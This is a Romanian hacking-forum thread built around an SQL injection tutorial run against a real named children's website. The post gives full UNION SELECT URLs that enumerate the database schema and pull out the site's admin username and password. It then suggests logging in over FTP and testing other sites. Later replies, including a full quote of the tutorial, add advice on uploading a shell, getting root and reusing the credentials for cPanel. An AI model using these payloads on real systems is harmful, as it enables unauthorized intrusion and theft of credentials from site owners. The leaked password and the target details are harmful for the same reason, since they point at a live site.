Jump to content
ZeroCold

[Tutorial]Sql injection

Recommended Posts

Posted (edited)

Tutorial SQL Injection

Cred ca nu a fost postat pt ca l-am cautat si nu l-am gasit... :D

Sa incepem ;)

PASUL 1:

-gasim un site:

eu am luat

PASUL 2:

-cautam vulnerabilitatea:

intram aici:

PASUL 3:

-dupa 8 punem '

-va arata asa:

Obs: Dupa ce am pus ' dupa 8 si am dat enter vedem ca a aparut o eroare,

aceasta eroare ne spune noua ca acest site este vulnerabil.

-Eroarea care o da arata asa:

QF: select * from articole where id=8\'

PASUL 4:

-acum ca stim ca acest site este vulnerabil folosim:

order by--

pentru a afla numarul de coloane din db sql.

-vom pune asa:

-am pus numarul de coloane 100.

Obs: Eroarea a aparut din nou, acum stim ca are mai putin de 100 de coloane.

-acum in loc de 100 punem 1.

-va arata asa:

Obs: Eroarea a disparut, inseamna ca are mai mult de 1 coloana si mai putin de 100.

-acum punem 10 pentru a vedea daca sunt mai putine de 10.

Obs: Eroarea a aparut, deci sunt mai putin de 10.

-acum punem 5:

Obs: eroarea a aparut, sunt mai putin de 5

-punem 4.

Obs: EROAREA NU APARE, DECI SUNT 4 COLOANE

PASUL 5:

-dupa ce am aflat cate coloane are (are 4 coloane) folosim:

union all select

-vom scrie asa:

Obs: Vedem ca nu apare nimic, inseamna ca functia union nu functioneaza.

PASUL 5:

-schimbam id-ul din url si in loc de "articol=8" punem "articol=-1"

-va arata asa:

Obs: Pe pagina au aparut doua cifre (4-2), acelea sunt coloanele vulnerabile.

PASUL 6:

-pentru a afla versiunea punem in loc de coloanele vulnerabile (4-2):

@@version

-va arata asa:

(eu l-am ales pe 2, puteti sa-l alegeti si pe 4, important este sa fie o cifra care va apare pe pagina)

Obs:In loc de cifra 2 care ne-a aparut in pasul anterior a aparut versiunea. (versiunea este: 5.0.32-Debian_7etch8-log )

PASUL 7:

-daca versiunea este mai mare de 5 folosim "information_schema" daca este mai mica ghicim totul.

-in cazul nostru versiunea este mai mare de 5, deci flolosim "information_schema"

-acum pentru a afla numele tabelelor punem in loc de 2:

table_name

si dupa 4 punem

from information_schema.tables--

-va arata asa:

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,table_name,3,4 from information_schema.tables--

Obs: a aparut"CHARACTER_SETS", este numele unui tabel, noua ne trebuie ceva de genu admin...utilizator...user.

-acum pentru a vedea numele urmatorului tabel folosim "limit".

-dupa "from information_schema.tables--" adaugam "limit 1,1--"

-va arata asa:

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,table_name,3,4 from information_schema.tables limit 1,1--

Obs: a aparut "COLLATIONS", noi va trebui sa inlocuim 1,1 cu 2,1 ; 3,1...si tot asa pana ne zice ceva de legat de admin/user/username.

-la "limit 20,1--" am primit "USER":

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,table_name,3,4 from information_schema.tables limit 20,1--

-am aflat numele tabelului, mai trebuie si coloana.

-acum inlocuim "table_name" cu "column_name" si in "information_schema.tables" scriem "information_schema.columns"

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,column_name,3,4 from information_schema.columns limit 20,1--

PASUL 8:

-acum aflam username si pass

-ne folosim de ce ne-a dat la pasul 7 cand am primit numele tabelului "USER"

-inlocuim "information_schema.columns limit 20,1--" cu "user--", iar in loc de 2 punem username sau user.

-va arata asa:

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,username,3,4 from user--

Obs: apare eroare ..NU E BINE!

-inlocuim "username" cu "user":

-va arata asa:

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,user,3,4 from user--

Obs: in loc de cifra 4 scrie "Admin"..acesta este username-ul.

-acum ca am aflat username trebuie sa aflam parola...

-inlocuim "user" cu "password".

-vom avea asa:

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,password,3,4 from user--

Obs: Apare eroare, iar nu e bine.

-inlcuim "password" cu "pass", vom avea asa:

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,pass,3,4 from user--

Obs: A aparun "sunshine". Aceasta este parola.

PASUL 9:

-Va logati cu nume si parola.

-In cazul siteului www.magiacopilariei.ro nu avem unde sa ne logam, trebuie sa folosim ftp.

-Puteti cauta alte siteuri si sa le testati.

FINISH!

ATENTIE!!! Spargerea siteurilor este ILEGALA!!!

Acest tutorial este doar informativ, nu sunt responsabil pentru pagubele provocate.

Edited by ZeroCold
  • Upvote 1
  • Downvote 1
Posted
Tutorial SQL Injection

Cred ca nu a fost postat pt ca l-am cautat si nu l-am gasit... :D

Sa incepem ;)

PASUL 1:

-gasim un site:

eu am luat

PASUL 2:

-cautam vulnerabilitatea:

intram aici:

PASUL 3:

-dupa 8 punem '

-va arata asa:

Obs: Dupa ce am pus ' dupa 8 si am dat enter vedem ca a aparut o eroare,

aceasta eroare ne spune noua ca acest site este vulnerabil.

-Eroarea care o da arata asa:

PASUL 4:

-acum ca stim ca acest site este vulnerabil folosim:

order by--

pentru a afla numarul de coloane din db sql.

-vom pune asa:

-am pus numarul de coloane 100.

Obs: Eroarea a aparut din nou, acum stim ca are mai putin de 100 de coloane.

-acum in loc de 100 punem 1.

-va arata asa:

Obs: Eroarea a disparut, inseamna ca are mai mult de 1 coloana si mai putin de 100.

-acum punem 10 pentru a vedea daca sunt mai putine de 10.

Obs: Eroarea a aparut, deci sunt mai putin de 10.

-acum punem 5:

Obs: eroarea a aparut, sunt mai putin de 5

-punem 4.

Obs: EROAREA NU APARE, DECI SUNT 4 COLOANE

PASUL 5:

-dupa ce am aflat cate coloane are (are 4 coloane) folosim:

union all select

-vom scrie asa:

Obs: Vedem ca nu apare nimic, inseamna ca functia union nu functioneaza.

PASUL 5:

-schimbam id-ul din url si in loc de "articol=8" punem "articol=-1"

-va arata asa:

Obs: Pe pagina au aparut doua cifre (4-2), acelea sunt coloanele vulnerabile.

PASUL 6:

-pentru a afla versiunea punem in loc de coloanele vulnerabile (4-2):

@@version

-va arata asa:

(eu l-am ales pe 2, puteti sa-l alegeti si pe 4, important este sa fie o cifra care va apare pe pagina)

Obs:In loc de cifra 2 care ne-a aparut in pasul anterior a aparut versiunea. (versiunea este: 5.0.32-Debian_7etch8-log )

PASUL 7:

-daca versiunea este mai mare de 5 folosim "information_schema" daca este mai mica ghicim totul.

-in cazul nostru versiunea este mai mare de 5, deci flolosim "information_schema"

-acum pentru a afla numele tabelelor punem in loc de 2:

table_name

si dupa 4 punem

from information_schema.tables--

-va arata asa:

Obs: a aparut"CHARACTER_SETS", este numele unui tabel, noua ne trebuie ceva de genu admin...utilizator...user.

-acum pentru a vedea numele urmatorului tabel folosim "limit".

-dupa "from information_schema.tables--" adaugam "limit 1,1--"

-va arata asa:

Obs: a aparut "COLLATIONS", noi va trebui sa inlocuim 1,1 cu 2,1 ; 3,1...si tot asa pana ne zice ceva de legat de admin/user/username.

-la "limit 20,1--" am primit "USER":

-am aflat numele tabelului, mai trebuie si coloana.

-acum inlocuim "table_name" cu "column_name" si in "information_schema.tables" scriem "information_schema.columns"

PASUL 8:

-acum aflam username si pass

-ne folosim de ce ne-a dat la pasul 7 cand am primit numele tabelului "USER"

-inlocuim "information_schema.columns limit 20,1--" cu "user--", iar in loc de 2 punem username sau user.

-va arata asa:

Obs: apare eroare ..NU E BINE!

-inlocuim "username" cu "user":

-va arata asa:

Obs: in loc de cifra 4 scrie "Admin"..acesta este username-ul.

-acum ca am aflat username trebuie sa aflam parola...

-inlocuim "user" cu "password".

-vom avea asa:

Obs: Apare eroare, iar nu e bine.

-inlcuim "password" cu "pass", vom avea asa:

Obs: A aparun "sunshine". Aceasta este parola.

PASUL 9:

-Va logati cu nume si parola.

-In cazul siteului www.magiacopilariei.ro nu avem unde sa ne logam, trebuie sa folosim ftp.

-Puteti cauta alte siteuri si sa le testati.

FINISH!

ATENTIE!!! Spargerea siteurilor este ILEGALA!!!

Acest tutorial este doar informativ, nu sunt responsabil pentru pagubele provocate.

e facut de tine tutorialul ?

  • Downvote 1
Posted

O referinta, (stiu ca sunt multe altele pe net), pe asta o aveam in favorite si mai trag un ochi din cand in cand:

htp://packetstorm.igor.onlinedirect.bg/papers/database/mssql-pwnage.txt

Guest Kabron
Posted

YE YE YE toata lumea face tutoriale SQL injection dar nu stim baza SQL :| bun bun

Guest Praetorian
Posted

Pai imagineaza-ti ca ai deschis un site/forum si ai acces admin!

Ce poti face?

Posted

...iti zic eu depinde de cum e facut panoul de administrare si ce e facut sa poti face din el...daca vrei mai mult cauti sa urci un shell si poate cu un exploit sa iei si root...

Posted
YE YE YE toata lumea face tutoriale SQL injection dar nu stim baza SQL :| bun bun

Aici cam are dreptate.trebuie sa invatam mai intai despre bazede de date SQL si apoi sa sa cautam vulnerabilitati.

Ar fi fost fain daca ar daca AR LASA "UNU"DE PE HB un tutorial complet despre injectarea cu cod malitios baze de date sql,mysql,mssql.Ceva super complet cu detalii cu tot.

Posted

UNU e printre putini care ii respect in ceea ce face in domeniul sqli... multi ar avea ce sa invete de la el.

cat despre tutorial... sunt peste 100 toate al fel.... toate copiate unul din altul:|

Posted

am si eu cateva intrebari : poate fi vulnerabila o pagina care nu are linkul de forma x=numar ? si daca da , cum procedam ?

2) cum ar arata pagina daca ar mergem union all select?

Posted

@ edededi sau te lasi de meserie, sau incerci sa te abtii de la postat intrebari idioate, si te pui pe cautat pe google tutoriale deja facute ( sunt cu milioanele ) sau convingi pe unu care are timp de tine sa-ti explice pe IM. practic ce faci tu e spam.

Posted

Multumesc begood pentru raspunsul tau plin de informatii utile.Nu pricep ce contin intrebarile mele de sunt asa idioate,pur si simplu am intrebat de o chestie care nu e prezenta in acest tutorial, de aici pana "a face spam" e cale lunga.Multumesc inca odata ca m-ati lamurit

Posted

O sa il caut, cred ca o sa iasa o chestie destul de interesanta

EDIT: Hertz da-mi PM, daca esti interesat sa facem challengeuri pt rst, nu de alta dar vad ca nu ai lasati nici o metoda de contact publica.:D

Posted

mi se pare firesc, la cpanel userul este de obicei numele directorului din home unde este siteul (incearca sa generezi o eroare in php sa iti raspunda cu error at line on si adresa catre fisier), unii il pun ca fiind primele 8 litere din domeniu, si pass una aleasa de cel care a deschis contul, de obicei cel putin de complexitate medie si diferita de domeniu, in cazul de fata este posibil sa fie sunshine.

Posted

userul si pass mai exact sunt ca cele de la ftp, portul mi se pare ca e cel default de la cpanel, mai se poate accesa in mod normal si prin site.tld/cpanel si te redirectioneaza la login.

Guest
This topic is now closed to further replies.


×
×
  • Create New...